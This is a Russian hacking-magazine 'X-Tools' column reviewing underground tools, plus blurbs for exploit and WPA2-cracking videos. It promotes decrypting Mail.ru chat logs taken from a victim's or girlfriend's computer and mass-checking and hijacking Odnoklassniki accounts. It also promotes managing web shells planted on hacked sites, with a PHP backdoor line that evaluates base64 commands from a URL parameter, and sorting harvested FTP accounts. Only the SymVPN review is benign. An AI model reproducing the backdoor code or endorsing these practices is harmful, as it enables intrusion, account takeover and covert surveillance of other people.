Хакер № 08/09 (128)
X-Tools
Леонид «R0id» Стройков (r0id@mail.ru)
Mail.ru History Reader
- ОС: WIndows 2000/XP
- Автор: Gar|k
Различные IM-клиенты в последнее время расплодились в огромном количестве. Причина - растущая популярность онлайновых систем обмена мгновенными сообщениями. В качестве примера можно привести mail-агент от Mail.ru, набравший немаленькую аудиторию юзеров. Мессенджер получился действительно удобный и функциональный, но с одним недостатком - чужую историю переписки в нем почитать не так-то просто. А ведь иногда доступ к хистори необходим, особенно, если она слита с компа твоей девушки :). Однако решение есть, и имя ему - Mail.ru History Reader. Тулза предназначена для дешифровки логов mail-агента и приведения истории переписки в удобочитаемый вид. Использовать утилу довольно просто:
1. Сливаем интересующие нас логи переписки с компа жертвы, вида: blabla@mail.ruhistory.txt
2. Копируем софтинку с нашего DVD себе на винт и запускаем через консоль
3. Указываем history-файл и файл для сохранения результата:
C:\conv.exe blabla@mail.ruhistory.txt blabla@mail.ru.txt
4. Получаем файлик blabla@mail.ru.txt , в котором и лежит расшифрованная история переписки :)
Тулза работает с логами mail-агента <= 5.3-версии, так что либо всячески агитируй автора - товарища Gar|k'а – на дальнейшее развитие утилы, либо отговаривай свою девушку обновлять mail-агент. Сорцы утилы ты найдешь на нашем диске.
Odnoklassniki.ru Password Changer & Account Checker
- ОС: WIndows 2000/XP
- Автор: Zdez Bil Ya
В прошлых выпусках Х-Тулз я публиковал несколько интересных утил, облегчающих всестороннюю работу с популярными социальными сетями. Не будем нарушать традицию и сразу перейдем к описанию полезного софта, который на этот раз предназначен исключительно для ресурса odnoklassniki.ru и включает в себя две утилы: Odnoklassniki.ru Password Changer и Odnoklassniki.ru Account Checker. Как видно из названий, проги позволяют чекать аккаунты и менять на них пароли в автоматическом режиме. Начнем с ченджера пассов aka утилы для массовой смены паролей на акках в «Одноклассниках». Тулза позволяет:
- менять пароли на аккаунтах на один заданный пасс
- менять пароли на аккаунтах на генеренные пассы
Все аккаунты должны храниться в файле accounts.txt, вид записей: логин;пароль. В процессе работы утила использует несколько файлов:
- good_acc.txt - файл, в который помещаются все успешно смененные пары логин;новый_пароль
- bad_acc.txt - файл, в который помещаются все неудачно смененные пары логин;старый_пароль
- error_acc.txt - файл, куда помещаются аккаунты, в процессе обработки которых возникли непредвиденные ошибки
Из возможных причин, по которым аккаунты помещаются в bad_acc.txt, следует выделить:
- неверный старый пароль
- не подходит новый пароль (не соответствует правилам в социальной сети)
- аккаунт заблокирован
Как ты понимаешь, перед запуском ченджера пассов, желательно прочекать список аккаунтов на валид. Для этого мы заюзаем вторую утилу - чекер акков для «Одноклассников»:
- Все аккаунты должны храниться в файле accounts.txt, вид записей: логин;пароль.
- В процессе работы утила использует несколько файлов:
- good_acc.txt - файл, в который помещаются все валидные аккаунты
- block_acc.txt - файл, в который помещаются все заблокированные аккаунты, доступ к которым закрыт из-за частых попыток логина
- bad_acc.txt - файл, в который помещаются все невалидные аккаунты
- error_acc.txt - файл, в который помещаются аккаунты, в процессе обработки которых возникли непредвиденные ошибки
От себя добавлю, что обе утилы довольно удобны и вполне работоспособны. Причем, каждая из тулз является полноценным win32-приложением, а не PHP/перл-скриптом, как их аналоги. Благодарим автора - Zdez Bil Ya – и сливаем проги с нашего диска :).
Shell manager
- ОС: *nix/win
- Автор: Krist_ALL
Ежедневно, ломая тот или иной ресурс, мы пополняем свою коллекцию web-шеллов. Не знаю, как у тебя, но у меня в закладках насчитывается более сотни соответствующих линков, и это далеко не предел :). Возникает вполне логичный вопрос: как сортировать и чекать на валид весь этот архив шеллов? Для этой цели товарищем Krist_ALL'ом была написана небольшая утила под названием «Shell manager», позволяющая парсить веб-шеллы по твоему усмотрению. Тулза представляет собой пхп-скрипт, обладающий такими функциями, как:
- Проверка веб-шеллов на валидность
- Чекинг веб-шеллов с последующим определением PR/ТИЦ/Alexa_Rank
- Возможность ведения заметок по каждому веб-шеллу
- Массовое выполнение команд (отмечаем веб-шеллы, вводим команду и наблюдаем результат выполнения отдельно для каждого веб-шелла)
- Добавление веб-шеллов из списка
- Возможность экспорта результатов
- Наличие авторизации
Использовать скрипт довольно просто:
1. Запускаем скрипт, указав пароль (по дефолту: password)
2. Создаем необходимую таблицу в БД
3. Редактируем файл скрипта, изменив значение переменной $install на 1 и внеся данные о БД:
//----Настройка БД----------------
$db_host = ''; // Хост
$db_login = ''; // Пароль
$db_password = ''; // Пароль
$db_name = ''; // Имя базы данных
//----Настройка Shell Mananger----
$use_auth = 1; // 1 - Использовать авторизацию, 0 - не использовать
$install = 1; //заменить на 1, после создание таблицы
$password = 'password'; //Изменить на свой.
4. Чтобы добавленный веб-шелл чекался - необходимо в его код добавить пару строк:
if(isset($_GET['m'])) {echo 1; exit;}
elseif(isset($_GET['ev'])) { $sss =base64_decode($_GET['ev']); eval($sss); exit; }
5. Все, теперь чекер будет успешно взаимодействовать с добавленным веб-шеллом.
FTP Parser
- ОС: *nix/win
- Автор: [QwyZ]
При сборе фтп-акков каждый раз встает один и тот же вопрос: как лучше всего их отпарсить? Причем, речь идет не только о проверке валидности, но и о всевозможных сортировках доменов. Итак, представляю тебе утилу под незамысловатым названием «FTP Parser», способную отпарсить список фтп-учеток по самым разнообразным критериям. Тулза представляет собой PHP-скрипт весом в 3Кб и среди ее характеристик:
- Поиск красивых доменов среди базы фтп-акков (например, blabla.com)
- Возможность указания максимальной длины домена
- Возможность поиска определенных слов среди доменных имен
- Возможность осуществления поиска в субдоменах
- Функция сохранения результатов сортировки
- Автоматическая подсветка доменов, аккаунтов и искомых фраз в тексте
- Возможность соединения с любым фтп-серверов из списка после обработки запроса
Чтобы заюзать скрипт, следует задать ему несколько обязательных параметров, таких как:
- $z = доменная зона (например, &z=com), если ограничений нет, то * (например, &z=*)
- $m = максимальная длина домена (например, &m=14), если ограничений нет, то * (например, &m=*)
- $base = файл с фтп-акками, который располагается в каталоге ./bases (например, &base=file.txt)
- $all = включить поиск среди субдоменов (например, &all=1,&all=0)
- $save = включить функцию сохранения результатов запроса (используется каталог ./querie), например, &save=yes,&save=no
- $word = поиск определенных слов в доменных именах (например, &word=blabla)
То есть, после того, как ты залил скрипт на сервер, а также создал два каталога - ./bases (с фтп-листом внутри) и ./queries, тебе надо перейти по следующему линку:
http://твой_хост/parser.php?z=com&m=14&base=ftps.txt&all=0&save=yes&word=freehostia.com
Как ты уже понял, значения переменных в запросе напрямую зависят от тебя.
SymVPN
Если у тебя есть более-менее функциональный мобильник, то проблема безопасного веб-серфинга тебе знакома. Под различные мобильные платформы соксификаторы не сыщешь днем с огнем, не говоря уже про полноценный VPN. Однако если ты являешься счастливым обладателем девайса на базе Symbian OS 3rd, считай, что тебе повезло. Не так давно для этой ОС появился функциональный VPN-софт под названием SymVPN, поддерживающий протокол PPTP с шифрованием 128-битным ключом MPPE. Найти утилу ты сможешь на портале www.telexy.com, который принадлежит разработчикам всевозможного полезного софта под Symbian OS. Здесь тебе и SymRDP (Symbian Remote Desktop Connection Client), и SymNC (Network Commander) и много чего еще.
Правда, весь софт платный, но для жителей x-USSR действует скидка в 40% (telexy.com/Support/Publications.aspx?codeid=WGSBI6X6KV), что не так уж и плохо. На самом портале ты можешь слить триальную версию утилы и в течение 14 дней оценить все ее преимущества. Ну и после оценки по достоинству, разумеется, купить за какие-то жалкие 820 рублей :).
Для инсталляции потребуется пройти процедуру регистрации и указать все необходимые данные (email, imei твоей трубы). Это обязательно, ибо копия полученной тобой тулзы привязывается к IMEI-номеру телефона. Так или иначе, после получения линка на софт следует перейти к ее настройке, а именно:
- 1. Устанавливаем
- 2. Ребутим мобилку
- 3. Запускаем утилу, указываем параметры соединения, точку доступа (GPRS/Wi-Fi), IP-сервера, логин с паролем и имя точки доступа, которая будет ассоциироваться с VPN-каналом
- 4. Выбираем пункт меню «Проверить». Если все в порядке – софтинка выдаст сетевые реквизиты, которые должны быть получены под VPN (IP/маска/шлюз/DNS)
- 5. Запускаем стороннюю программу (можно при вырубленном SymVPN) и при запросе точки доступа лицезрим свежесозданную виртуальную точку. Недолго думая, выбираем ее, и весь трафик послушно форварднется на VPN-туннель
На данный момент софтина адаптирована практически под все юзабельные Symbiain-приложения и работает с большинством известных VPN-сервисов. Так что только ленивый не способен скачать, установить и постоянно использовать эту прекрасную утилу.
Содержание
ВИДЕО К ЭТОМУ НОМЕРУНовый оборонительный рубеж
В этом ролике познакомимся с возможностями наиболее популярных HIPS-систем - Safe´n´Sec, DefenseWall и Prevx...
Начальник сети
Диспетчер System Center Configuration Manager 2007 является усовершенствованным вариантом Systems Management Server и призван обеспечивать в динамично изменяющихся средах возможность по управлению и полному контролю над всей IT-инфраструктурой...
Автосплойт своими руками
В правильных руках можно не только получить дедик, но и сразу много дедиков. Очень много! Смотри внимательно, и да откроется тебе черная магия автосплойта!...
Совладай с WPA2
В этом видео мы покажем, насколько просто может быть взломана беспроводная сеть, даже если она защищена WPA...
|
 |
|
